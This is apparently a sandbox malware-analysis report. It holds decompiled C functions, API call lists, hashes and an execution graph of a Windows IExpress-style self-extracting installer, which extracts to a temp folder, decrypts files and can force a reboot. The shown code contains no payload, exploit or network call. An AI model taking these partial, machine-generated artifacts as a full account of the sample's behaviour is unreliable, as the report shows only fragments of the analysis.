                                                                                                                                                                                                                                                							_t9 =  *_t28;
                                                                                                                                                                                                                                                							_t28 = _t28 + 1;
                                                                                                                                                                                                                                                						} while (_t9 != 0);
                                                                                                                                                                                                                                                						E00051680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                                						_t11 =  *0x591e0; // 0x26d7100
                                                                                                                                                                                                                                                						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                                						 *0x591e0 = _t34;
                                                                                                                                                                                                                                                						return 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t25 =  *0x58584; // 0x0
                                                                                                                                                                                                                                                					E000544B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                                					LocalFree(_t34);
                                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t26 =  *0x58584; // 0x0
                                                                                                                                                                                                                                                				E000544B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                                				goto L2;
                                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00054E6F), ref: 000547EA
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00054823
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00054847
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00054851
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                • API String ID: 359063898-2312194364
                                                                                                                                                                                                                                                • Opcode ID: 5cfddce1218040f8a4eae5f904eccdc330e7f93e97352a00136fc81ad030c69d
                                                                                                                                                                                                                                                • Instruction ID: 3d293f02fb14b134f3cb91218a669dc14d341efe1c915693e10385b61d236f6a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cfddce1218040f8a4eae5f904eccdc330e7f93e97352a00136fc81ad030c69d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1110675604B41AFEB658F349C18FFB3B9AEBC5306B148519EE4297341DE398C4A8B60
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                			E00056517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                                				struct HRSRC__* _t6;
                                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                                				int _t24;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t23 =  *0x59a3c; // 0x50000
                                                                                                                                                                                                                                                				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                                				if(_t6 == 0) {
                                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                                					E000544B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					_t24 = _a16;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                                					if(_t21 == 0) {
                                                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if(_a12 != 0) {
                                                                                                                                                                                                                                                							_push(_a12);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                                						FreeResource(_t21);
                                                                                                                                                                                                                                                						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                                							goto L6;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t24;
                                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00050000,000007D6,00000005), ref: 0005652A
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00050000,00000000,?,?,00052EE8,00000000,000519E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00056538
                                                                                                                                                                                                                                                • DialogBoxIndirectParamA.USER32(00050000,00000000,00000547,000519E0,00000000), ref: 00056557
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00052EE8,00000000,000519E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00056560
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1214682469-0
                                                                                                                                                                                                                                                • Opcode ID: 5882d6d9f0abce637f6e523c53c93b3fc23cd3914cb34092c5dcebc30e794288
                                                                                                                                                                                                                                                • Instruction ID: 4e815405683d057535157589f1fd8e50054d4d5373f417848234298db5e65cdb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5882d6d9f0abce637f6e523c53c93b3fc23cd3914cb34092c5dcebc30e794288
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C101DB72240B15BBEB105F699C48DBB7AACEB85763F400215FE1093190EB76CD5086B1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00053680(void* __ecx) {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				struct tagMSG _v36;
                                                                                                                                                                                                                                                				int _t8;
                                                                                                                                                                                                                                                				struct HWND__* _t16;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_v8 = __ecx;
                                                                                                                                                                                                                                                				_t16 = 0;
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                                					if(_t8 == 0) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                                								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t16 = 1;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                                						} while (_t8 != 0);
                                                                                                                                                                                                                                                						if(_t16 == 0) {
                                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					break;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t8;
                                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0005369F
                                                                                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000536B2
                                                                                                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 000536CB
                                                                                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000536DA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2776232527-0
                                                                                                                                                                                                                                                • Opcode ID: 04945a626a2a65dba1b13a4542ec199f433fb25a5deedbed3aab2b4d3457f531
                                                                                                                                                                                                                                                • Instruction ID: 335f7f978241698f55caf3001fcd55126717eb5ef6ac5e201d4d76343dec7a85
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04945a626a2a65dba1b13a4542ec199f433fb25a5deedbed3aab2b4d3457f531
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60018472A002187BDB304AA65C48EEB7ABCEB86B52F00421DBD05E2180D5648A44C675
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                                                                			E000565E8(char* __ecx) {
                                                                                                                                                                                                                                                				char _t3;
                                                                                                                                                                                                                                                				char _t10;
                                                                                                                                                                                                                                                				char* _t12;
                                                                                                                                                                                                                                                				char* _t14;
                                                                                                                                                                                                                                                				char* _t15;
                                                                                                                                                                                                                                                				CHAR* _t16;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t12 = __ecx;
                                                                                                                                                                                                                                                				_t15 = __ecx;
                                                                                                                                                                                                                                                				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                                				_t10 = 0;
                                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                                					_t3 =  *_t12;
                                                                                                                                                                                                                                                					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                                				} while (_t3 != 0);
                                                                                                                                                                                                                                                				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                                					if(_t16 <= _t15) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                                						L7:
                                                                                                                                                                                                                                                						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                                							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						 *_t16 = _t10;
                                                                                                                                                                                                                                                						_t10 = 1;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_push(_t16);
                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                					return _t10;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				goto L11;
                                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                                0x00056610
                                                                                                                                                                                                                                                0x00056610
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00056610
                                                                                                                                                                                                                                                0x00056644
                                                                                                                                                                                                                                                0x00056647
                                                                                                                                                                                                                                                0x00056647
                                                                                                                                                                                                                                                0x00056621
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00052B33), ref: 00056602
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000), ref: 00056612
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000), ref: 00056629
                                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 00056635
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Prev$Next
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3260447230-0
                                                                                                                                                                                                                                                • Opcode ID: 77d03316c04928ae45c1b049b13f93992d0ff550e472ed96b4e7d3c9e92a2869
                                                                                                                                                                                                                                                • Instruction ID: fa0e59623bab2be203042a18cc7f6f2bb39746cb97262e76bfbd6d0fff644cd8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77d03316c04928ae45c1b049b13f93992d0ff550e472ed96b4e7d3c9e92a2869
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77F02D311045506EE7321B284C888BBBFDCCF87357B59026FED9183101D61B0D0A8761
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000569B0() {
                                                                                                                                                                                                                                                				intOrPtr* _t4;
                                                                                                                                                                                                                                                				intOrPtr* _t5;
                                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                                				intOrPtr _t11;
                                                                                                                                                                                                                                                				intOrPtr _t12;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				 *0x581f8 = E00056C70();
                                                                                                                                                                                                                                                				__set_app_type(E00056FBE(2));
                                                                                                                                                                                                                                                				 *0x588a4 =  *0x588a4 | 0xffffffff;
                                                                                                                                                                                                                                                				 *0x588a8 =  *0x588a8 | 0xffffffff;
                                                                                                                                                                                                                                                				_t4 = __p__fmode();
                                                                                                                                                                                                                                                				_t11 =  *0x58528; // 0x0
                                                                                                                                                                                                                                                				 *_t4 = _t11;
                                                                                                                                                                                                                                                				_t5 = __p__commode();
                                                                                                                                                                                                                                                				_t12 =  *0x5851c; // 0x0
                                                                                                                                                                                                                                                				 *_t5 = _t12;
                                                                                                                                                                                                                                                				_t6 = E00057000();
                                                                                                                                                                                                                                                				if( *0x58000 == 0) {
                                                                                                                                                                                                                                                					__setusermatherr(E00057000);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				E000571EF(_t6);
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00056FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00056FC5
                                                                                                                                                                                                                                                • __set_app_type.MSVCRT ref: 000569C2
                                                                                                                                                                                                                                                • __p__fmode.MSVCRT ref: 000569D8
                                                                                                                                                                                                                                                • __p__commode.MSVCRT ref: 000569E6
                                                                                                                                                                                                                                                • __setusermatherr.MSVCRT ref: 00056A07
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1632413811-0
                                                                                                                                                                                                                                                • Opcode ID: be52f587542654b8e2325ae6091ea58c84528c2afb095cbfa56d9eeb6358502b
                                                                                                                                                                                                                                                • Instruction ID: cf55bc59190cd6b951bd0bedfaf7ce232362dfa48ca4cd3deb597f6e23dea73d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be52f587542654b8e2325ae6091ea58c84528c2afb095cbfa56d9eeb6358502b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04F0DA70508701CFE7586B34AD0F61B3BA1E705333B504619ED52962E1DF3E8548CB15
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:28.7%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:959
                                                                                                                                                                                                                                                Total number of Limit Nodes:24
3168->3172 3173 232c5 EndDialog 3168->3173 3171 23366 3169->3171 3179 232fc 3169->3179 3170->3178 3177 244b9 20 API calls 3171->3177 3174 2325c LoadStringA 3172->3174 3172->3178 3173->3178 3175 23294 3174->3175 3176 2327b 3174->3176 3198 24224 LoadLibraryA 3175->3198 3182 244b9 20 API calls 3176->3182 3177->3178 3179->3171 3181 23331 GetFileAttributesA 3179->3181 3184 2333f 3181->3184 3185 2337c 3181->3185 3182->3162 3188 244b9 20 API calls 3184->3188 3187 2658a CharPrevA 3185->3187 3186 232a5 SetDlgItemTextA 3186->3176 3186->3178 3189 2338d 3187->3189 3190 23351 3188->3190 3191 258c8 27 API calls 3189->3191 3190->3178 3192 2335a CreateDirectoryA 3190->3192 3193 23394 3191->3193 3192->3171 3192->3185 3193->3171 3194 233a4 3193->3194 3195 233c7 EndDialog 3194->3195 3196 2597d 34 API calls 3194->3196 3195->3178 3197 233c3 3196->3197 3197->3178 3197->3195 3199 243b2 3198->3199 3200 24246 GetProcAddress 3198->3200 3204 244b9 20 API calls 3199->3204 3201 243a4 FreeLibrary 3200->3201 3202 2425d GetProcAddress 3200->3202 3201->3199 3202->3201 3203 24274 GetProcAddress 3202->3203 3203->3201 3205 2428b 3203->3205 3206 2329d 3204->3206 3207 24295 GetTempPathA 3205->3207 3211 242e1 3205->3211 3206->3178 3206->3186 3208 242ad 3207->3208 3208->3208 3209 242b4 CharPrevA 3208->3209 3210 242d0 CharPrevA 3209->3210 3209->3211 3210->3211 3212 24390 FreeLibrary 3211->3212 3212->3206 3213 24a50 3214 24a66 3213->3214 3215 24a9f ReadFile 3213->3215 3216 24abb 3214->3216 3217 24a82 memcpy 3214->3217 3215->3216 3217->3216 3218 23450 3219 234d3 EndDialog 3218->3219 3220 2345e 3218->3220 3221 2346a 3219->3221 3222 2349a GetDesktopWindow 3220->3222 3226 23465 3220->3226 3223 243d0 11 API calls 3222->3223 3224 234ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3223->3224 3224->3221 3225 2348c EndDialog 3225->3221 3226->3221 3226->3225 2355 24ca0 GlobalAlloc 2356 26a60 2373 27155 2356->2373 2358 26a65 2359 26a76 GetStartupInfoW 2358->2359 2360 26a93 2359->2360 2361 26aa8 2360->2361 2362 
26aaf Sleep 2360->2362 2363 26ac7 _amsg_exit 2361->2363 2366 26ad1 2361->2366 2362->2360 2363->2366 2364 26b13 _initterm 2365 26b2e __IsNonwritableInCurrentImage 2364->2365 2368 26bd6 _ismbblead 2365->2368 2369 26c1e 2365->2369 2372 26bbe exit 2365->2372 2378 22bfb GetVersion 2365->2378 2366->2364 2366->2365 2367 26af4 2366->2367 2368->2365 2369->2367 2370 26c27 _cexit 2369->2370 2370->2367 2372->2365 2374 2717a 2373->2374 2375 2717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2373->2375 2374->2375 2376 271e2 2374->2376 2377 271cd 2375->2377 2376->2358 2377->2376 2379 22c50 2378->2379 2380 22c0f 2378->2380 2395 22caa memset memset memset 2379->2395 2380->2379 2381 22c13 GetModuleHandleW 2380->2381 2381->2379 2383 22c22 GetProcAddress 2381->2383 2383->2379 2392 22c34 2383->2392 2385 22c8e 2386 22c97 CloseHandle 2385->2386 2387 22c9e 2385->2387 2386->2387 2387->2365 2392->2379 2393 22c89 2489 21f90 2393->2489 2506 2468f FindResourceA SizeofResource 2395->2506 2398 22ef3 2401 244b9 20 API calls 2398->2401 2399 22d2d CreateEventA SetEvent 2400 2468f 7 API calls 2399->2400 2402 22d57 2400->2402 2403 22d6e 2401->2403 2404 22d5b 2402->2404 2406 22e1f 2402->2406 2409 2468f 7 API calls 2402->2409 2407 26ce0 4 API calls 2403->2407 2405 244b9 20 API calls 2404->2405 2405->2403 2511 25c9e 2406->2511 2410 22c62 2407->2410 2412 22d9f 2409->2412 2410->2385 2436 22f1d 2410->2436 2412->2404 2413 22da3 CreateMutexA 2412->2413 2413->2406 2416 22dbd GetLastError 2413->2416 2414 22e30 2414->2398 2415 22e3a 2417 22e52 FindResourceA 2415->2417 2418 22e43 2415->2418 2416->2406 2420 22dca 2416->2420 2421 22e64 LoadResource 2417->2421 2422 22e6e 2417->2422 2537 22390 2418->2537 2423 22dd5 2420->2423 2424 22dea 2420->2424 2421->2422 2427 22e4d 2422->2427 2552 236ee GetVersionExA 2422->2552 2425 244b9 20 API calls 2423->2425 2426 244b9 20 API calls 2424->2426 2428 22de8 2425->2428 2429 22dff 2426->2429 2427->2403 2431 22e04 CloseHandle 
2428->2431 2429->2406 2429->2431 2431->2403 2435 26517 24 API calls 2435->2427 2437 22f3f 2436->2437 2438 22f6c 2436->2438 2440 22f5f 2437->2440 2641 251e5 2437->2641 2660 25164 2438->2660 2788 23a3f 2440->2788 2441 22f71 2472 2303c 2441->2472 2673 255a0 2441->2673 2448 26ce0 4 API calls 2450 22c6b 2448->2450 2449 22f86 GetSystemDirectoryA 2451 2658a CharPrevA 2449->2451 2476 252b6 2450->2476 2452 22fab LoadLibraryA 2451->2452 2453 22fc0 GetProcAddress 2452->2453 2454 22ff7 FreeLibrary 2452->2454 2453->2454 2455 22fd6 DecryptFileA 2453->2455 2456 23006 2454->2456 2457 23017 SetCurrentDirectoryA 2454->2457 2455->2454 2465 22ff0 2455->2465 2456->2457 2721 2621e GetWindowsDirectoryA 2456->2721 2458 23026 2457->2458 2459 23054 2457->2459 2461 244b9 20 API calls 2458->2461 2471 23061 2459->2471 2731 23b26 2459->2731 2464 23037 2461->2464 2807 26285 GetLastError 2464->2807 2465->2454 2468 23098 2468->2472 2474 230af 2468->2474 2469 2307a 2469->2468 2751 23ba2 2469->2751 2471->2469 2471->2472 2740 2256d 2471->2740 2472->2448 2809 24169 2474->2809 2477 252d6 2476->2477 2485 25316 2476->2485 2480 25300 LocalFree LocalFree 2477->2480 2481 252eb SetFileAttributesA DeleteFileA 2477->2481 2478 25374 2479 2538c 2478->2479 3115 21fe1 2478->3115 2482 26ce0 4 API calls 2479->2482 2480->2477 2480->2485 2481->2480 2484 22c72 2482->2484 2484->2385 2484->2393 2485->2478 2486 2535e SetCurrentDirectoryA 2485->2486 2487 265e8 4 API calls 2485->2487 2488 22390 13 API calls 2486->2488 2487->2486 2488->2478 2490 21f9f 2489->2490 2491 21f9a 2489->2491 2493 21fc0 2490->2493 2494 244b9 20 API calls 2490->2494 2498 21fd9 2490->2498 2492 21ea7 15 API calls 2491->2492 2492->2490 2495 21ee2 GetCurrentProcess OpenProcessToken 2493->2495 2496 21fcf ExitWindowsEx 2493->2496 2493->2498 2494->2493 2499 21f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2500 21f0e 2495->2500 2496->2498 2498->2385 2499->2500 2501 21f6b ExitWindowsEx 2499->2501 2503 244b9 20 API calls 2500->2503 
2501->2500 2502 21f1f 2501->2502 2504 26ce0 4 API calls 2502->2504 2503->2502 2505 21f8c 2504->2505 2505->2385 2507 22d1a 2506->2507 2508 246b6 2506->2508 2507->2398 2507->2399 2508->2507 2509 246be FindResourceA LoadResource LockResource 2508->2509 2509->2507 2510 246df memcpy_s FreeResource 2509->2510 2510->2507 2517 25e17 2511->2517 2534 25cc3 2511->2534 2512 26ce0 4 API calls 2513 22e2c 2512->2513 2513->2414 2513->2415 2514 25ced CharNextA 2514->2534 2515 25dec GetModuleFileNameA 2516 25e0a 2515->2516 2515->2517 2587 266c8 2516->2587 2517->2512 2519 26218 2596 26e2a 2519->2596 2522 25dd0 2522->2515 2522->2517 2523 25e36 CharUpperA 2524 261d0 2523->2524 2523->2534 2525 244b9 20 API calls 2524->2525 2526 261e7 2525->2526 2527 261f0 CloseHandle 2526->2527 2528 261f7 ExitProcess 2526->2528 2527->2528 2529 25f9f CharUpperA 2529->2534 2530 25f59 CompareStringA 2530->2534 2531 26003 CharUpperA 2531->2534 2532 25edc CharUpperA 2532->2534 2533 260a2 CharUpperA 2533->2534 2534->2514 2534->2517 2534->2519 2534->2522 2534->2523 2534->2529 2534->2530 2534->2531 2534->2532 2534->2533 2536 2667f IsDBCSLeadByte CharNextA 2534->2536 2592 2658a 2534->2592 2536->2534 2538 224cb 2537->2538 2541 223b9 2537->2541 2539 26ce0 4 API calls 2538->2539 2540 224dc 2539->2540 2540->2427 2541->2538 2542 223e9 FindFirstFileA 2541->2542 2542->2538 2550 22407 2542->2550 2543 22421 lstrcmpA 2545 22431 lstrcmpA 2543->2545 2546 224a9 FindNextFileA 2543->2546 2544 22479 2547 22488 SetFileAttributesA DeleteFileA 2544->2547 2545->2546 2545->2550 2548 224bd FindClose RemoveDirectoryA 2546->2548 2546->2550 2547->2546 2548->2538 2549 2658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2546 2550->2549 2551 22390 5 API calls 2550->2551 2551->2550 2556 23737 2552->2556 2557 2372d 2552->2557 2553 244b9 20 API calls 2566 239fc 2553->2566 2554 26ce0 4 API calls 2555 22e92 2554->2555 2555->2403 2555->2427 2567 218a3 2555->2567 2556->2557 2559 238a4 2556->2559 2556->2566 2603 228e8 2556->2603 2557->2553 
